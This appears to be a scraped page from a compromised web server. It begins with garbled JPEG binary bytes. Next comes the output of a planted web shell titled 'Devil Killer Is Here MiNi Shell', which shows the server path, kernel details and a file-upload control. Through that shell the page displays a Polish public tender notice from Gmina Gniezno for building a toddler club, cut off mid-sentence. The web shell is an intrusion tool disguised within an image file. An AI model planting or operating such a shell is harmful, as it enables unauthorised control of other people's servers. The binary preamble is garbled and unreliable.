JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240209/0010015301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa klubu malucha w Gminie Gniezno w ramach programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH+” 2022-2029 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GNIEZNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259519</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleje Władysława Stanisława Reymonta 9-11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gniezno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">61 4245750</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">61 4245751</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@urzadgminy.gniezno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.urzadgminy.gniezno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa klubu malucha w Gminie Gniezno w ramach programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH+” 2022-2029 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f5b68ceb-c74b-11ee-a84d-d63fc4d19e65</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00100153</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00002595/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.25 Budowa klubu malucha w Gminie Gniezno w ramach programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH+” 2022-2029</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie dla Rozwoju Społecznego 2021-2027 pn. Program rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH+” 2022-2029 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/886168 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/886168</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/transakcja/886168 opcja &#34;Wyślij wiadomość do zamawiającego&#34;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”)<br/>informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wójt Gminy Gniezno;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem<br/>e-mail: iod@lesny.com.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie<br/>przetargu nieograniczonego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym<br/>z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia<br/>publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo<br/>do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GR.271.18.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa parterowego budynku klubu malucha. Budynek niepodpiwniczony o<br/>zwartej bryle wykonany w technologii tradycyjnej – murowany, przykryty niewentylowanym stropodachem<br/>płaskim. Budynek o zwartej bryle w rzucie poziomym w kształcie zgrupowanych prostokątów o wymiarach<br/>zewnętrznych: 15,34 x 22,32 m i wysokości 4,86 m. Teren działki nie jest zabudowany i ogrodzony, do tej pory<br/>użytkowana jako rola.<br/>Przed budynkiem projektuje się plac przeznaczony do parkowania samochodów oraz drogę pożarową, zgodnie z<br/>projektem zagospodarowania działki rys. nr A-1. Drogę zaprojektowano z jasnoszarej kostki betonowej o gr. 8,0<br/>cm, na podsypce piaskowej gr. 3,0 cm oraz podbudowie zasadniczej z kruszywa łamanego 0/31 o gr. 25,0 cm.<br/>▪ Od strony wschodniej budynku projektuje się chodnik o szerokości 1,5 m, zgodnie z projektem<br/>zagospodarowania działki rys. nr A-1. Chodnik stanowi połączenie wejścia głównego z wyjściem ogrodowym i<br/>prowadzi do odrębnego wejścia do kotłowni oraz węzła cateringowego. Chodnik planuje się wykonać z<br/>grafitowej kostki betonowej o gr. 6,0 cm układanej na warstwie chudego betonu o grubości 10,0 cm oraz 30,0<br/>cm warstwie podsypki piaskowej.<br/>▪ Zakres opracowania działki projektuje się ogrodzić siatką stalową o wysokości 1,5 m. We frontowej- północnej<br/>granicy planuje się wejście na działkę – furtkę ze stalowej siatki panelowej o wymiarach szer. 100 x h. 150cm<br/>oraz stalową, przesuwną bramę wjazdową o wymiarach szer. 400 x h. 150 cm. Odprowadzenie ścieków do czasu<br/>realizacji kanalizacji sanitarnej projektuje się dwa zbiorniki bezodpływowe o pojemności V=10,0 m3 zgodnie z<br/>projektem branży sanitarnej (odrębny projekt techniczny). Zbiorniki zlokalizowane są w odległości powyżej<br/>10,0m od okien i drzwi do pomieszczeń przeznaczonych na pobyt ludzi, powyżej 4,00 m od granicy z działką<br/>sąsiednią nr 110/14, oraz powyżej 3,66 m od granicy z działka drogową nr 8, zgodnie z odstępstwem w Decyzji<br/>o ustaleniu lokalizacji inwestycji celu publicznego nr 22/2023 z dnia 08.12.2023r. We frontową części granicy<br/>działki projektuje się utwardzone miejsce na śmietniki. Główne wejście do budynku zlokalizowane jest we<br/>frontowej północnej elewacji. Dodatkowe wejście znajduje się w tylnej-ogrodowej elewacji. Osobne wejścia do<br/>kotłowni oraz do rozdzielni posiłków zlokalizowane są w bocznej wschodniej elewacji. Na działce<br/>zaprojektowano dziesięć miejsc postojowych w tym jedno przystosowane dla osób niepełnosprawnych. Miejsca<br/>postojowe zaprojektowane w odległości powyżej 7,0 m od okien pomieszczeń przeznaczonych na stały pobyt<br/>ludzi oraz w odległości powyżej 3,0 m od granicy z działkami sąsiednimi. Dostęp do drogi (dz. nr 8) od<br/>północnej strony działki – projektowanym zjazdem.<br/>Parametry techniczne sieci i urządzeń uzbrojenia terenu<br/>Ogrzewanie: Projektuje się centralne ogrzewanie przy użyciu pieca gazowego zlokalizowanego w kotłowni oraz<br/>pompy ciepła wspomaganej fotowoltaiką, zgodnie z projektem branży sanitarnej (odrębny projekt techniczny).<br/>Odprowadzenie wód opadowych:<br/>▪ z połaci dachowych do dwóch podziemnych zbiorników na deszczówkę z wykorzystaniem do podlewania<br/>ogrodu.<br/>▪ z powierzchni utwardzonych odprowadzone odpływami liniowymi bezpośrednio do studzienek<br/>bezodpływowych z wykorzystaniem do podlewania ogrodu oraz na teren działki.<br/>Zaopatrzenie w wodę: Projektuje się wewnętrzną instalację wodociągową z istniejącej sieci wodociągu<br/>gminnego, zgodnie z projektem branży sanitarnej (odrębny projekt techniczny).<br/>Zaopatrzenie w energię elektryczna: Projektuje się wewnętrzna instalację elektryczną z istniejącej sieci<br/>elektroenergetycznej, zgodnie z projektem branży elektrycznej (odrębny projekt techniczny).<br/>Zaopatrzenie telekomunikacyjne : Projektuje się wewnętrzna instalację telekomunikacyjną z istniejącej sieci<br/>telekomunikacyjnej, zgodnie z projektem branży elektrycznej (odrębny projekt techniczny).<br/>Na obszarze działki objętym opracowaniem różnica spadku terenu wynosi powyżej 2,0 m. Dookoła budynku<br/>należy wykonać prefabrykowane murki oporowe, umożliwiające dostęp do budynku w miejscu dużej różnicy<br/>terenu. Zieleń - trawniki projektuje się wzbogacić o zieleń ozdobną (nie trującą) - zgodnie z załącznikiem<br/>graficznym rys. A-1 plan zagospodarowania działki. We wschodniej i zachodniej części działki oraz dookoła<br/>placu zabaw należy nasadzić krzewy typu „bukszpan” i ”berberys”. Plac zabaw znajduje się w południowej –<br/>tylnej części zakresu opracowania, na skarpie. Dostęp do placu stanowią zewnętrzne schody terenowe.<br/>Nawierzchnię placu zaprojektowano poliuretanową z bezspoinowej syntetycznej nawierzchni bezpiecznej z<br/>przeznaczeniem na place zabaw, wykonanej na bazie granulatu gumowego i kleju poliuretanowego.<br/>Na placu zaplanowano pięć urządzeń do zabaw:<br/>- huśtawka metalowa potrójna z bocianim gniazdem<br/>- huśtawka bujak wolnostojący – 2 szt.<br/>- piaskownica kwadratowa z bali o wymiarach 3,0 x 3,0 m<br/>- zjeżdżalnia<br/>wszystkie urządzenia placu zabaw muszą mieć orzeczenia techniczne zgodne z wymogami normy PN-EN 1176.<br/>Powierzchnia utwardzona: 657,00 m2<br/>▪ chodnik: 130,00 m2<br/>▪ droga dojazdowa+parkingi: 350,00 m2<br/>▪ utwardzenie syntetyczne placu zabaw: 177,00 m2<br/>▪ powierzchnia wewnętrzna budynku 268,72 m2<br/>▪ wysokość 4,86 m<br/>▪ ilość kondygnacji nadziemnych 1<br/>▪ ilość kondygnacji podziemnych 0<br/>▪ kubatura brutto 1’319,25 m3<br/>▪ powierzchnia zabudowy 299,83 m2<br/>Przedmiot zamówienia obejmuje montaż rolet z napędem elektrycznym na oknach budynku.<br/>Zamawiający wymaga aby kocioł gazowy posiadał 60 miesięczną gwarancję producenta.<br/>Przedmiot zamówienia obejmuje również wykonanie i umieszczenie w miejscu realizacji inwestycji tablicy<br/>informacyjnej zgodnie z Wytycznymi dotyczącymi zapisów umów ws. przekazania dofinansowania w zakresie<br/>realizacji obowiązków informacyjno-promocyjnych przez ostatecznego odbiorcę wsparcia w ramach programu<br/>MALUCH+ 2022–2029 finansowanego ze środków KPO i FERS.<br/>Ponadto, w ramach gwarancji Wykonawca zobowiązany jest do:<br/>- wykonania przeglądów okresowych budynków w rozumieniu art. 62 Prawo budowlane (Dz.U. z 2023 r.<br/>poz. 682);<br/>- zapewnienia instrukcji bezpieczeństwa pożarowego wraz z zakupem wymaganych urządzeń<br/>przeciwpożarowych i gaśnic oraz zapewnienie przeglądów technicznych i czynności konserwacyjnych zgodnie<br/>z § 6 Rozporządzenia Ministra Spraw Wewnętrznych i Administracji w sprawie ochrony przeciwpożarowej<br/>budynków, innych obiektów budowlanych i terenów (Dz.U. z 2023 r. poz. 822).<br/>Szczegóły zawarto w PT </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45214100-1 - Roboty budowlane w zakresie budowy przedszkolnych obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ofert:<br/>Nazwa kryterium: cena (CC)<br/>CC = Comin / Cobad x Kp x Wc<br/>sposób oceny: Comin – najniższa oferowana cena brutto<br/>Cobad – cena ofertowa brutto badanej oferty<br/>Kp – współczynnik proporcjonalności 100<br/>Wc – waga kryterium oceny – 60 %<br/>Nazwa kryterium: gwarancja dodatkowa (GG)<br/>Maksymalna ilość punktów w tym kryterium wynosi 40.<br/>Okres gwarancji, liczony w miesiącach, należy wybrać i zaznaczyć w tabeli formularza oferty. Ilość<br/>punktów przyznana ofercie w tym kryterium zostanie określona zgodnie z poniższymi zapisami:<br/>60 miesięcy (minimum dopuszczone przez Zamawiającego) – 0 pkt,<br/>72 miesięcy – 20 pkt,<br/>84 miesiące (maksymalna ilość) – 40 pkt.<br/>Wykonawca, składając ofertę, zobowiązany jest do wyboru okresu gwarancji. W sytuacji, gdy<br/>Wykonawca nie zaznaczy w formularzu ofertowym w tabeli wybranego okresu gwarancji w miesiącach,<br/>tj. nie postawi przy nim znaku „X” lub postawi w tabeli więcej niż jeden znak „X”, Zamawiający<br/>przyjmie, że Wykonawca oferuje okres gwarancji w ilości 60 miesięcy<br/>UWAGA: W przypadku zaoferowania gwarancji dłuższej niż minimum dopuszczone przez Zamawiającego, wydłużają się<br/>obowiązki Wykonawcy dotyczące przeglądów okresowych oraz przeglądów konserwacyjnych urządzeń przeciwpożarowych<br/>(zgodnie z opisem przedmiotu zamówienia) o czas zaproponowanej gwarancji dodatkowej. Przedłużony termin gwarancji nie<br/>dotyczy urządzeń, na które wystawiona została gwarancja producenta.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja dodatkowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dotyczący zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy w tym okresie, wykonał co najmniej jedną robotę budowlaną polegającą na<br/>budowie (w rozumieniu ustawy Prawo budowlane) budynku o powierzchni użytkowej co najmniej<br/>200 m2 i wartości co najmniej 1 200 000,00 zł brutto wraz z robotami towarzyszącymi polegającymi<br/>na zagospodarowaniu terenu przyległego do budynku. Przez zagospodarowanie terenu Zamawiający<br/>rozumie wykonanie łącznie co najmniej: ciągów komunikacyjnych (np. chodnik), miejsc postojowych<br/>i elementów małej architektury, z podaniem wartości, przedmiotu, dat wykonania/wykonywania<br/>i podmiotów, na rzecz których roboty zostały wykonane lub są wykonywane, oraz załączeniem<br/>dowodów, określających, czy roboty zostały wykonane lub są wykonywane należycie.<br/>Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia w oparciu o złożone<br/>dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.2. Na potwierdzenie braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o<br/>udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków<br/>dowodowych:<br/>- zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych 